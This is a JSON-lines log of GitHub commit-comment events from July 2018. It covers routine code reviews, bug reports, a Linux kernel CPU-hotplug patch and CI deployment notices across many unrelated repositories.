{"id":"7942060524","type":"CommitCommentEvent","actor":{"login":"YingJieZhangIIE"},"repo":{"name":"YingJieZhangIIE/Speed-up-MILP-with-Matsui-"},"payload":{"comment":{"id":29652142,"position":null,"line":null,"path":null,"commit_id":"4f40613431d6176e18c44f583e6c0408f461efb8","created_at":"2018-07-10T07:49:31Z","updated_at":"2018-07-10T07:49:31Z","author_association":"OWNER","body":"ISC2018"}},"created_at":"2018-07-10T07:49:31Z"}
{"id":"7942063216","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29652153,"position":14,"line":14,"path":"route.rb","commit_id":"983de5adfdfbe3dab8b58a5de7fba977b0293fd5","created_at":"2018-07-10T07:50:13Z","updated_at":"2018-07-10T07:50:13Z","author_association":"OWNER","body":"Horosho ispravil na takoi kak v TZ"}},"created_at":"2018-07-10T07:50:13Z"}
{"id":"7942063234","type":"CommitCommentEvent","actor":{"login":"chenliang86"},"repo":{"name":"opendaylight/docs"},"payload":{"comment":{"id":29652154,"position":2,"line":1,"path":"docs/developer-guide/alto-developer-guide.rst","commit_id":"2636b86495c4374f39bea79549205ecbaed8ed29","created_at":"2018-07-10T07:50:13Z","updated_at":"2018-07-10T07:50:13Z","author_association":"NONE","body":"Can you help me identify how to modify the authentication mode of netconf connector?\r\nkeyboard-interactive or password etc.\r\n"}},"created_at":"2018-07-10T07:50:13Z"}
{"id":"7942064216","type":"CommitCommentEvent","actor":{"login":"obiot"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":29652157,"position":5,"line":55,"path":"src/video/renderer.js","commit_id":"b1b43279154429e8aa4fa5afa29eddcd10bd19cc","created_at":"2018-07-10T07:50:26Z","updated_at":"2018-07-10T07:50:26Z","author_association":"MEMBER","body":"is this actually required for a texture quad ? \r\nhttps://github.com/melonjs/melonJS/blob/master/src/video/webgl/compositor.js#L365-L370\r\n"}},"created_at":"2018-07-10T07:50:26Z"}
{"id":"7942065306","type":"CommitCommentEvent","actor":{"login":"ctf0"},"repo":{"name":"ctf0/laravel-mix-versionhash"},"payload":{"comment":{"id":29652158,"position":null,"line":null,"path":null,"commit_id":"e8282f5f2c0c47ce012c1423880927be44ec0cef","created_at":"2018-07-10T07:50:42Z","updated_at":"2018-07-10T07:50:42Z","author_association":"OWNER","body":"u mean only `., -, _` are kept and anything else is replaced & yeah i should update the rdme"}},"created_at":"2018-07-10T07:50:42Z"}
{"id":"7942066186","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29652161,"position":20,"line":20,"path":"route.rb","commit_id":"983de5adfdfbe3dab8b58a5de7fba977b0293fd5","created_at":"2018-07-10T07:50:55Z","updated_at":"2018-07-10T07:50:55Z","author_association":"OWNER","body":"ok togda budet `print_station`"}},"created_at":"2018-07-10T07:50:55Z"}
{"id":"7942069222","type":"CommitCommentEvent","actor":{"login":"wjcsharp"},"repo":{"name":"xh2006/CppUtility"},"payload":{"comment":{"id":29652168,"position":40,"line":246,"path":"network/SimpleSocket.cpp","commit_id":"1c28e12461f1508995d562ce6ef0fe7e008982b7","created_at":"2018-07-10T07:51:41Z","updated_at":"2018-07-10T07:51:41Z","author_association":"NONE","body":"Maybe you need to use new(std::nothrow) here. Otherwise, it will throw exception instead of return nullptr."}},"created_at":"2018-07-10T07:51:41Z"}
{"id":"7942073477","type":"CommitCommentEvent","actor":{"login":"niniemann"},"repo":{"name":"sempr-tk/sempr"},"payload":{"comment":{"id":29652172,"position":40,"line":34,"path":"test/geometries_tests.cpp","commit_id":"4c2382e87a18189950a0557007e84b2b5e8acb6f","created_at":"2018-07-10T07:52:45Z","updated_at":"2018-07-10T07:52:45Z","author_association":"COLLABORATOR","body":"This will go wrong, won't it?\r\nNotice in the removed lines: `*(polygon->geometry()) = *poly;` I'm dereferencing the pointer before assignment, in order to **copy** the geometry from one instance to the other.\r\n\r\nBut `auto polygonGeom` is a pointer, and `polygonGeom = poly;` only leads to memory loss (since we don't have a pointer to the old polygonGeom anymore and can't free it) -- also, `[...]->destroyGeometry(poly);` makes `polygonGeom` invalid."}},"created_at":"2018-07-10T07:52:45Z"}
{"id":"7942074132","type":"CommitCommentEvent","actor":{"login":"Youngkiko"},"repo":{"name":"Youngkiko/just-test"},"payload":{"comment":{"id":29652175,"position":2,"line":2,"path":"README.md","commit_id":"ff6f432767fe3ede6c72e78e7f9eaa246c6d9c39","created_at":"2018-07-10T07:52:56Z","updated_at":"2018-07-10T07:52:56Z","author_association":"OWNER","body":"<!doctype>\r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n<div onmousedown=\"mDown(this)\" onmouseup=\"mUp(this)\" style=\"background-color:pink;\r\nwidth:180px;height:50px;color:white;\">请点击</div>\r\n<script>\r\nfunction mDown(obj)\r\n{\r\nobj.style.backgroundColor=\"pink\";\r\nobj.innerHTML=\"请释放\"\r\n}\r\n\r\nfunction mUp(obj)\r\n{\r\nobj.style.backgroundColor=\"yellow\";\r\nobj.innerHTML=\"请点击\"\r\n}\r\n</script>\r\n</body>\r\n</html>\r\n\r\n- [ ] \r\n\r\n- [ ] \r\n\r\n- [ ] "}},"created_at":"2018-07-10T07:52:56Z"}
{"id":"7942075623","type":"CommitCommentEvent","actor":{"login":"curaor"},"repo":{"name":"curaor/node-hello-world2"},"payload":{"comment":{"id":29652178,"position":null,"line":null,"path":null,"commit_id":"9e2e6971d5b31e4722255197d4054e16ffdf66a9","created_at":"2018-07-10T07:53:19Z","updated_at":"2018-07-10T07:53:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/35f9c31f-2fee-4760-b025-5a4ca98160eb?env_id=ibm%3Ayp%3Aus-south \"Demo01\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/dce6692c-6b28-440f-bfa9-8baa3df9b6f1?env_id=ibm%3Ayp%3Aus-south \"Demo Pipeline\") deployed [node-hello-world2](https://github.com/curaor/node-hello-world2/releases/tag/deploy-ibm-yp-us-south-omar.cura-omar.cura-20180710-075318 \"deploy-ibm-yp-us-south-omar.cura-omar.cura-20180710-075318\") to [omar.cura](https://console.bluemix.net/apps/a48db9b0-8e29-4058-a336-9d4ec4377acb?env_id=ibm:yp:us-south \"ibm:yp:us-south:omar.cura:omar.cura\"), including this commit"}},"created_at":"2018-07-10T07:53:19Z"}
{"id":"7942076479","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29652181,"position":23,"line":23,"path":"route.rb","commit_id":"983de5adfdfbe3dab8b58a5de7fba977b0293fd5","created_at":"2018-07-10T07:53:33Z","updated_at":"2018-07-10T07:53:33Z","author_association":"OWNER","body":"```\r\ndef first_station\r\n  @stations[0]\r\nend\r\n```\r\n\r\n```\r\ndef last_station\r\n  @stations[-1]\r\nend\r\n```"}},"created_at":"2018-07-10T07:53:33Z"}
{"id":"7942078484","type":"CommitCommentEvent","actor":{"login":"kejinling"},"repo":{"name":"0day-ci/linux"},"payload":{"comment":{"id":29652183,"position":null,"line":null,"path":null,"commit_id":"5d7f5181553f4e7c3101a8ad9e54f4948385e349","created_at":"2018-07-10T07:54:03Z","updated_at":"2018-07-10T07:54:03Z","author_association":"NONE","body":"This patch has a sideeffect, when cpu_up fail. \r\nFor example:  echo 1 > /sys/devices/system/cpu/cpu7/online\r\ncpu_notify(CPU_UP_CANCELED, cpu); will be called 2 times , 1 is for cpuhp/7 kthead, another is called by cpu_up task(task of do echo 1 > /sys/devices/system/cpu/cpu7/online).\r\nIt maybe call so problem, cpu_notify(CPU_UP_CANCELED, cpu) is called before migration task to other cpu.\r\nso the correct patch is as follow:\r\ndiff --git a/kernel/cpu.c b/kernel/cpu.c\r\nold mode 100644\r\nnew mode 100755\r\nindex c68d1505a..e0f332372\r\n--- a/kernel/cpu.c\r\n+++ b/kernel/cpu.c\r\n@@ -504,7 +504,7 @@ static void undo_cpu_up(unsigned int cpu, struct cpuhp_cpu_state *st)\r\n }\r\n \r\n static int cpuhp_up_callbacks(unsigned int cpu, struct cpuhp_cpu_state *st,\r\n-\t\t\t      enum cpuhp_state target)\r\n+\t\t\t      enum cpuhp_state target, int callnotify)\r\n {\r\n \tenum cpuhp_state prev_state = st->state;\r\n \tint ret = 0;\r\n@@ -515,7 +515,8 @@ static int cpuhp_up_callbacks(unsigned int cpu, struct cpuhp_cpu_state *st,\r\n \t\tif (ret) {\r\n \t\t\tst->target = prev_state;\r\n \t\t\tundo_cpu_up(cpu, st);\r\n-\t\t\tcpu_notify(CPU_UP_CANCELED, cpu);\r\n+\t\t\tif (callnotify)\r\n+\t\t\t\tcpu_notify(CPU_UP_CANCELED, cpu);\r\n \t\t\tbreak;\r\n \t\t}\r\n \t}\r\n@@ -550,7 +551,7 @@ static int cpuhp_ap_offline(unsigned int cpu, struct cpuhp_cpu_state *st)\r\n /* Execute the online startup callbacks. Used to be CPU_ONLINE */\r\n static int cpuhp_ap_online(unsigned int cpu, struct cpuhp_cpu_state *st)\r\n {\r\n-\treturn cpuhp_up_callbacks(cpu, st, st->target);\r\n+\treturn cpuhp_up_callbacks(cpu, st, st->target, 0);\r\n }\r\n \r\n /*\r\n@@ -1075,7 +1076,7 @@ static int _cpu_up(unsigned int cpu, int tasks_frozen, enum cpuhp_state target)\r\n \t * responsible for bringing it up to the target state.\r\n \t */\r\n \ttarget = min((int)target, CPUHP_BRINGUP_CPU);\r\n-\tret = cpuhp_up_callbacks(cpu, st, target);\r\n+\tret = cpuhp_up_callbacks(cpu, st, target, 1);\r\n out:\r\n \ttrace_cpuhp_latency(cpu, 1, start_time, ret);\r\n \tcpu_hotplug_done();\r\n"}},"created_at":"2018-07-10T07:54:03Z"}
{"id":"7942079473","type":"CommitCommentEvent","actor":{"login":"wjcsharp"},"repo":{"name":"xh2006/CppUtility"},"payload":{"comment":{"id":29652187,"position":91,"line":283,"path":"network/SimpleSocket.cpp","commit_id":"1c28e12461f1508995d562ce6ef0fe7e008982b7","created_at":"2018-07-10T07:54:17Z","updated_at":"2018-07-10T07:54:17Z","author_association":"NONE","body":"You can write a new function for these duplicated codes. ;)"}},"created_at":"2018-07-10T07:54:17Z"}
{"id":"7942086012","type":"CommitCommentEvent","actor":{"login":"kejinling"},"repo":{"name":"0day-ci/linux"},"payload":{"comment":{"id":29652196,"position":null,"line":null,"path":null,"commit_id":"5d7f5181553f4e7c3101a8ad9e54f4948385e349","created_at":"2018-07-10T07:55:55Z","updated_at":"2018-07-10T07:55:55Z","author_association":"NONE","body":"send patch again:\r\n[fix_zram_ke_patch.txt](https://github.com/0day-ci/linux/files/2179375/fix_zram_ke_patch.txt)\r\n\r\n"}},"created_at":"2018-07-10T07:55:55Z"}
{"id":"7942086126","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29652197,"position":20,"line":20,"path":"route.rb","commit_id":"983de5adfdfbe3dab8b58a5de7fba977b0293fd5","created_at":"2018-07-10T07:55:57Z","updated_at":"2018-07-10T07:55:57Z","author_association":"NONE","body":"лучше во множественном числе )"}},"created_at":"2018-07-10T07:55:57Z"}
{"id":"7942086437","type":"CommitCommentEvent","actor":{"login":"ghewgill"},"repo":{"name":"ghewgill/neon-lang"},"payload":{"comment":{"id":29652199,"position":5,"line":27,"path":"exec/cnex/dictionary.h","commit_id":"504f886c9ca2402b7078c6247f982b3f1a2ab6b1","created_at":"2018-07-10T07:56:01Z","updated_at":"2018-07-10T07:56:01Z","author_association":"OWNER","body":"I thought you removed this from the header file because it was a private function. How did it get back in?"}},"created_at":"2018-07-10T07:56:01Z"}
{"id":"7942087003","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29652201,"position":23,"line":23,"path":"route.rb","commit_id":"983de5adfdfbe3dab8b58a5de7fba977b0293fd5","created_at":"2018-07-10T07:56:11Z","updated_at":"2018-07-10T07:56:11Z","author_association":"NONE","body":"верно"}},"created_at":"2018-07-10T07:56:11Z"}
{"id":"7942088930","type":"CommitCommentEvent","actor":{"login":"ghewgill"},"repo":{"name":"ghewgill/neon-lang"},"payload":{"comment":{"id":29652202,"position":7,"line":297,"path":"exec/cnex/global.c","commit_id":"504f886c9ca2402b7078c6247f982b3f1a2ab6b1","created_at":"2018-07-10T07:56:39Z","updated_at":"2018-07-10T07:56:39Z","author_association":"OWNER","body":"If you're going to check for addr->array == NULL, wouldn't you want to do that *before* using it?"}},"created_at":"2018-07-10T07:56:39Z"}
{"id":"7942090426","type":"CommitCommentEvent","actor":{"login":"alexvicegrab"},"repo":{"name":"MicrosoftDocs/azure-docs"},"payload":{"comment":{"id":29652203,"position":52,"line":45,"path":"articles/aks/kubernetes-dashboard.md","commit_id":"251c493ae4c640b674eb9572f50298e661f585f5","created_at":"2018-07-10T07:57:00Z","updated_at":"2018-07-10T07:57:00Z","author_association":"NONE","body":"Granting cluster-admin privileges to the Dashboard seems like a big security risk. Could you document a way that is secure?"}},"created_at":"2018-07-10T07:57:00Z"}
{"id":"7942099955","type":"CommitCommentEvent","actor":{"login":"cjmconie"},"repo":{"name":"BLOCKvIO/web-sdk"},"payload":{"comment":{"id":29652231,"position":6,"line":124,"path":"src/client/manager/Vatoms.js","commit_id":"6fe7ccdd4b1441bfb6fcb0a019de741b1a0c4532","created_at":"2018-07-10T07:59:19Z","updated_at":"2018-07-10T07:59:19Z","author_association":"NONE","body":"Prefer: \"Removes the specified vAtom from the current user's inventory.\""}},"created_at":"2018-07-10T07:59:19Z"}
{"id":"7942108986","type":"CommitCommentEvent","actor":{"login":"corlinus"},"repo":{"name":"Paullsam/Test-teach"},"payload":{"comment":{"id":29652253,"position":7,"line":7,"path":"figures/spec/pyramid_spec.rb","commit_id":"39c5c581fa16fbba76cb34e726cc1245e28e8ed3","created_at":"2018-07-10T08:01:19Z","updated_at":"2018-07-10T08:01:19Z","author_association":"COLLABORATOR","body":"мне кажется, так лучше не делать. или подобрать входные данные чтобы были ровные числа, или в eq передать выражение. выглядит не очень и не контролируется никак."}},"created_at":"2018-07-10T08:01:19Z"}
{"id":"7942109716","type":"CommitCommentEvent","actor":{"login":"epochchaser"},"repo":{"name":"epochchaser/eos-toolbox"},"payload":{"comment":{"id":29652254,"position":null,"line":null,"path":null,"commit_id":"e33693e92a380019f9de00aed495b9736d17e33b","created_at":"2018-07-10T08:01:29Z","updated_at":"2018-07-10T08:01:29Z","author_association":"OWNER","body":"nice!"}},"created_at":"2018-07-10T08:01:29Z"}
{"id":"7942110119","type":"CommitCommentEvent","actor":{"login":"1jack-github"},"repo":{"name":"1jack-github/1jack-github.github.io"},"payload":{"comment":{"id":29652255,"position":null,"line":null,"path":null,"commit_id":"d87db70065ceadcc423d6e46a94dad1c970f5032","created_at":"2018-07-10T08:01:35Z","updated_at":"2018-07-10T08:01:35Z","author_association":"OWNER","body":"this is so insteresting!"}},"created_at":"2018-07-10T08:01:35Z"}
{"id":"7942119270","type":"CommitCommentEvent","actor":{"login":"rzulian"},"repo":{"name":"donkeytech/gaia-engine"},"payload":{"comment":{"id":29652277,"position":null,"line":null,"path":null,"commit_id":"50dd5cd52d9439065e155b9cd8097b9c4e5e43d6","created_at":"2018-07-10T08:03:49Z","updated_at":"2018-07-10T08:03:49Z","author_association":"COLLABORATOR","body":"This is wrong. Space Stations aren't satellites"}},"created_at":"2018-07-10T08:03:49Z"}
{"id":"7942120667","type":"CommitCommentEvent","actor":{"login":"mart-e"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29652283,"position":null,"line":null,"path":null,"commit_id":"b87a95b6d6b846b660506a3f4ef3472ebc4df809","created_at":"2018-07-10T08:04:11Z","updated_at":"2018-07-10T08:04:11Z","author_association":"CONTRIBUTOR","body":"Added in the doc :wink: 24e01664d414313e6298f007efb1ed7cba126c20"}},"created_at":"2018-07-10T08:04:11Z"}
{"id":"7942123107","type":"CommitCommentEvent","actor":{"login":"javadaoke"},"repo":{"name":"javadaoke/great_work"},"payload":{"comment":{"id":29652290,"position":null,"line":null,"path":null,"commit_id":"8c5d7a47f413f2b58f34abafa7e844e3cf4e94f3","created_at":"2018-07-10T08:04:45Z","updated_at":"2018-07-10T08:04:45Z","author_association":"OWNER","body":"update change"}},"created_at":"2018-07-10T08:04:45Z"}
{"id":"7942124491","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29652295,"position":null,"line":null,"path":null,"commit_id":"2cee78edc78d63318ed01a47f0036d20f69e5cfe","created_at":"2018-07-10T08:05:07Z","updated_at":"2018-07-10T08:05:07Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-statewid](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-statewid).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-statewid-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-10T08:05:07Z"}
{"id":"7942124833","type":"CommitCommentEvent","actor":{"login":"coyotte508"},"repo":{"name":"donkeytech/gaia-engine"},"payload":{"comment":{"id":29652296,"position":null,"line":null,"path":null,"commit_id":"50dd5cd52d9439065e155b9cd8097b9c4e5e43d6","created_at":"2018-07-10T08:05:12Z","updated_at":"2018-07-10T08:05:12Z","author_association":"CONTRIBUTOR","body":"They are for the sake of final scoring.\r\n\r\n> Built the most satellites. (The Ivits’ space stations count as satellites.)"}},"created_at":"2018-07-10T08:05:12Z"}
{"id":"7942125210","type":"CommitCommentEvent","actor":{"login":"rzulian"},"repo":{"name":"donkeytech/gaia-engine"},"payload":{"comment":{"id":29652297,"position":52,"line":727,"path":"src/engine.ts","commit_id":"820c3047030170b376b6df5adf41ed686a1be836","created_at":"2018-07-10T08:05:17Z","updated_at":"2018-07-10T08:05:17Z","author_association":"COLLABORATOR","body":"You are missing the need to get an advance research action if you pick and adv tech tile"}},"created_at":"2018-07-10T08:05:17Z"}
{"id":"7942127466","type":"CommitCommentEvent","actor":{"login":"DocRockwell"},"repo":{"name":"DocRockwell/RealismOverhaul"},"payload":{"comment":{"id":29652305,"position":null,"line":null,"path":null,"commit_id":"9a6b5470353623e379df8850231466d9f4d55110","created_at":"2018-07-10T08:05:48Z","updated_at":"2018-07-10T08:05:48Z","author_association":"OWNER","body":"Fixed omni antenna"}},"created_at":"2018-07-10T08:05:48Z"}
{"id":"7942130995","type":"CommitCommentEvent","actor":{"login":"oddhome"},"repo":{"name":"samadsajanlal/yiimp"},"payload":{"comment":{"id":29652313,"position":null,"line":null,"path":null,"commit_id":"152f23ea5113ebeb9621da43c475ca4c5ff0e579","created_at":"2018-07-10T08:06:39Z","updated_at":"2018-07-10T08:06:39Z","author_association":"NONE","body":"compile fail require equihash_hash function"}},"created_at":"2018-07-10T08:06:39Z"}
{"id":"7942131035","type":"CommitCommentEvent","actor":{"login":"kennykarnama"},"repo":{"name":"kennykarnama/onesdk"},"payload":{"comment":{"id":29652314,"position":null,"line":null,"path":null,"commit_id":"abddf99a2dcd0ae414ee059be0da749b295ceff8","created_at":"2018-07-10T08:06:40Z","updated_at":"2018-07-10T08:06:40Z","author_association":"OWNER","body":"Refactor comment To only accept array because array_merge only accepts array "}},"created_at":"2018-07-10T08:06:40Z"}
{"id":"7942132364","type":"CommitCommentEvent","actor":{"login":"coyotte508"},"repo":{"name":"donkeytech/gaia-engine"},"payload":{"comment":{"id":29652319,"position":52,"line":727,"path":"src/engine.ts","commit_id":"820c3047030170b376b6df5adf41ed686a1be836","created_at":"2018-07-10T08:06:59Z","updated_at":"2018-07-10T08:06:59Z","author_association":"CONTRIBUTOR","body":"you're right"}},"created_at":"2018-07-10T08:06:59Z"}
{"id":"7942132972","type":"CommitCommentEvent","actor":{"login":"PierreRambaud"},"repo":{"name":"mickaelandrieu/PrestaShop"},"payload":{"comment":{"id":29652320,"position":15,"line":77,"path":"tools/build/Library/Version.php","commit_id":"29b7ed328c2701622ace522c9fbd46ec6821de83","created_at":"2018-07-10T08:07:08Z","updated_at":"2018-07-10T08:07:08Z","author_association":"COLLABORATOR","body":"You forgot the second (string) :D"}},"created_at":"2018-07-10T08:07:08Z"}
{"id":"7942142852","type":"CommitCommentEvent","actor":{"login":"albfan"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29652345,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-10T08:09:33Z","updated_at":"2018-07-10T08:09:33Z","author_association":"COLLABORATOR","body":"I think it would be clear to just post here the gitlab repo, and archive or delete this repo"}},"created_at":"2018-07-10T08:09:33Z"}
{"id":"7942147118","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/AdmiralFox"},"payload":{"comment":{"id":29652355,"position":4,"line":16,"path":"week-08/day-5/src/main/java/com/greenfoxacademy/thereddit/models/TheReddit.java","commit_id":"897c7c9662d77b1ef33b55a3e298335cca10dfec","created_at":"2018-07-10T08:10:29Z","updated_at":"2018-07-10T08:10:29Z","author_association":"NONE","body":"I know the task, so I can figure out that here you wanted to store the votes. Unfortunately the status means something more. If you remember at the aircraft exercise there was a `shipName.status()` method that informed us about the ship's current health, ammo, etc. I would name this field like `score`."}},"created_at":"2018-07-10T08:10:29Z"}
{"id":"7942148165","type":"CommitCommentEvent","actor":{"login":"parasyte"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":29652356,"position":5,"line":55,"path":"src/video/renderer.js","commit_id":"b1b43279154429e8aa4fa5afa29eddcd10bd19cc","created_at":"2018-07-10T08:10:43Z","updated_at":"2018-07-10T08:10:43Z","author_association":"MEMBER","body":"IIRC it’s used for the fade transitions. Or at least that was the original purpose."}},"created_at":"2018-07-10T08:10:43Z"}
{"id":"7942162456","type":"CommitCommentEvent","actor":{"login":"alphadl"},"repo":{"name":"OpenNMT/OpenNMT-py"},"payload":{"comment":{"id":29652392,"position":94,"line":59,"path":"tools/extract_embeddings.py","commit_id":"6a5373829a4b7674d6e4ebcf37f30612685b8e1e","created_at":"2018-07-10T08:13:50Z","updated_at":"2018-07-10T08:13:50Z","author_association":"NONE","body":"why add this cnn_kernel_width ? "}},"created_at":"2018-07-10T08:13:50Z"}
{"id":"7942162819","type":"CommitCommentEvent","actor":{"login":"KrotSV"},"repo":{"name":"nicolre239/queuebot"},"payload":{"comment":{"id":29652393,"position":79,"line":79,"path":"Bot.java","commit_id":"8b17fc26e300038cc989bf31d33a02678ecdd22b","created_at":"2018-07-10T08:13:55Z","updated_at":"2018-07-10T08:13:55Z","author_association":"NONE","body":"Названия методов, согласно всем джавовым кодстайлам, идут кэмэлкейсом с маленькой буквы"}},"created_at":"2018-07-10T08:13:55Z"}
{"id":"7942163926","type":"CommitCommentEvent","actor":{"login":"moorscode"},"repo":{"name":"Yoast/wordpress-seo"},"payload":{"comment":{"id":29652397,"position":5,"line":705,"path":"frontend/class-frontend.php","commit_id":"9aa6f1cab122136a6952d846f896d62626c92031","created_at":"2018-07-10T08:14:08Z","updated_at":"2018-07-10T08:14:08Z","author_association":"MEMBER","body":"Do you have a specific situation in which this can be true?\r\nTo my knowledge, `is_shop()` is only true on a page which has a `$post`.\r\n\r\nCould be an improvement to use `get_queried_object()` here."}},"created_at":"2018-07-10T08:14:08Z"}
{"id":"7942165466","type":"CommitCommentEvent","actor":{"login":"tobyjamez"},"repo":{"name":"bombrun/GaiaLab"},"payload":{"comment":{"id":29652399,"position":null,"line":null,"path":null,"commit_id":"96c108bde0b77a047566fef33e56a0ae7124c641","created_at":"2018-07-10T08:14:25Z","updated_at":"2018-07-10T08:14:25Z","author_association":"COLLABORATOR","body":":%s/nomalies/nomaly/g\r\n\r\nNew behaviour in isolateAnomaly allows all anomalies (not just hits) to be isolated, but this is INCREDIBLY slow. Not really worth doing but I'm going to keep it."}},"created_at":"2018-07-10T08:14:25Z"}
{"id":"7942169355","type":"CommitCommentEvent","actor":{"login":"efectusmagnus"},"repo":{"name":"efectusmagnus/memory-game"},"payload":{"comment":{"id":29652408,"position":4,"line":15,"path":"README.md","commit_id":"3c3e1e104e322da4ead2bc79a0a8d1eaa49d4acd","created_at":"2018-07-10T08:15:09Z","updated_at":"2018-07-10T08:15:09Z","author_association":"OWNER","body":"![screenshot-memory-game](https://user-images.githubusercontent.com/38544496/42497572-182bcf90-842a-11e8-8874-6c6cd07b9061.png)\r\n![screenshot-memory-game1](https://user-images.githubusercontent.com/38544496/42497573-184ef3d0-842a-11e8-8f7a-8d0fed64ba97.png)\r\n"}},"created_at":"2018-07-10T08:15:09Z"}
{"id":"7942169588","type":"CommitCommentEvent","actor":{"login":"zhouxiaoyang"},"repo":{"name":"zhouxiaoyang/springCloudDemo"},"payload":{"comment":{"id":29652410,"position":null,"line":null,"path":null,"commit_id":"c8945bd83791ac80a184bf04c0133fc71519ad42","created_at":"2018-07-10T08:15:12Z","updated_at":"2018-07-10T08:15:12Z","author_association":"OWNER","body":"xiugai"}},"created_at":"2018-07-10T08:15:12Z"}
{"id":"7942170107","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29652414,"position":null,"line":null,"path":null,"commit_id":"3c5ba567a4b2388004b1a55f57769980414ef6b9","created_at":"2018-07-10T08:15:18Z","updated_at":"2018-07-10T08:15:18Z","author_association":"NONE","body":"хороший код\r\nрубокоп почти не ругается )\r\nчтобы сделать код еще лучше и уменьшить количество претензий рубокопа можно предпринять следующие шаги  в классе Интерфейс (основные претензии и не безосновательные у рубокопа именно к нему):\r\n - из методов \"мейн меню\", \"меню криэйт\", \"меню роут\", \"меню трейн\" и т.д. вытащить первые строчки методов (набор путсов) либо в отдельные методы здесь же... либо в методы в модуле / модулях (к примеру у тебя есть чудесный модуль Мессадж)\r\n-  еще в этих же методах (во всех) есть одинаковый код:\r\n```ruby\r\n      input = gets.to_i\r\n      \r\n      break if input == 9\r\n```\r\nможно эти две строки вынести в метод с именем `input`, который бы возвращал значение `input`\r\nтогда во всех этих методах эти строки просто удаляем, а \"кейс\" будет обращаться не к переменной, а к методу\r\n- в методе \"нью вагон\" я бы порекомендовал в ветках \"иф элса\"  сделать вызовы методов, вместо непосредственного кода по созданию вагонов\r\n- методе \"сидс\" неиспользуемая переменная `c` )))\r\n\r\n"}},"created_at":"2018-07-10T08:15:18Z"}
{"id":"7942178587","type":"CommitCommentEvent","actor":{"login":"AgustiinNoah"},"repo":{"name":"AgustiinNoah/DBZ"},"payload":{"comment":{"id":29652422,"position":null,"line":null,"path":null,"commit_id":"db7aca08bc01eb1b217c464e553c81a8960517ce","created_at":"2018-07-10T08:16:36Z","updated_at":"2018-07-10T08:16:36Z","author_association":"OWNER","body":"jj"}},"created_at":"2018-07-10T08:16:36Z"}
{"id":"7942178939","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29652425,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-10T08:16:40Z","updated_at":"2018-07-10T08:16:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T08:16:40Z"}
{"id":"7942179037","type":"CommitCommentEvent","actor":{"login":"alphadl"},"repo":{"name":"OpenNMT/OpenNMT-py"},"payload":{"comment":{"id":29652426,"position":null,"line":null,"path":null,"commit_id":"9738d78d6f7c92dcdcd291af7a4b34de44024997","created_at":"2018-07-10T08:16:41Z","updated_at":"2018-07-10T08:16:41Z","author_association":"NONE","body":"why there is no change compared with previous \"add cnn_kernel_width\" version  "}},"created_at":"2018-07-10T08:16:41Z"}
{"id":"7942186139","type":"CommitCommentEvent","actor":{"login":"jaska120"},"repo":{"name":"Yoast/wordpress-seo"},"payload":{"comment":{"id":29652442,"position":5,"line":705,"path":"frontend/class-frontend.php","commit_id":"9aa6f1cab122136a6952d846f896d62626c92031","created_at":"2018-07-10T08:18:05Z","updated_at":"2018-07-10T08:18:05Z","author_association":"NONE","body":"Some of the themes out there uses product-archive template for search results. If the search query doesn't return any hits $post object would be null but `is_shop()` would evaluate true because of template in use. I have seen situation like this."}},"created_at":"2018-07-10T08:18:05Z"}
